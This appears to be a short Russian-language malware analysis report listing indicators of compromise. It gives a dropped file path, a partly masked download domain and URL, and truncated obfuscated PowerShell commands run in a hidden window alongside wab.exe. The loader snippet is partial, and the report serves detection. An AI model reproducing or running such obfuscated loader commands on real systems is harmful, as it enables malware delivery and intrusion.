Техническая информация
- wab.exe
- %APPDATA%\vllingen82.sva
- 'la##i.net':80
- http://www.la##i.net/Befippet.toc
- DNS ASK la##i.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Frkrigstidens = 1;Function Mugging($Fremfrelseshastigheden249){$trivial=$Fremfrelseshastigheden249.Length-$Frkrigstidens;$Plumagery='Substring';For( $bifluoride=5;$bifluoride -lt $trivial;$bi... (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "echo %appdata%\Vllingen82.Sva && echo t"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "$Frkrigstidens = 1;Function Mugging($Fremfrelseshastigheden249){$trivial=$Fremfrelseshastigheden249.Length-$Frkrigstidens;$Plumagery='Substring';For( $bifluoride=5;$bifluoride -lt $trivial;$bi...
- '%WINDIR%\syswow64\cmd.exe' /c "echo %appdata%\Vllingen82.Sva && echo t"
- '%ProgramFiles(x86)%\windows mail\wab.exe'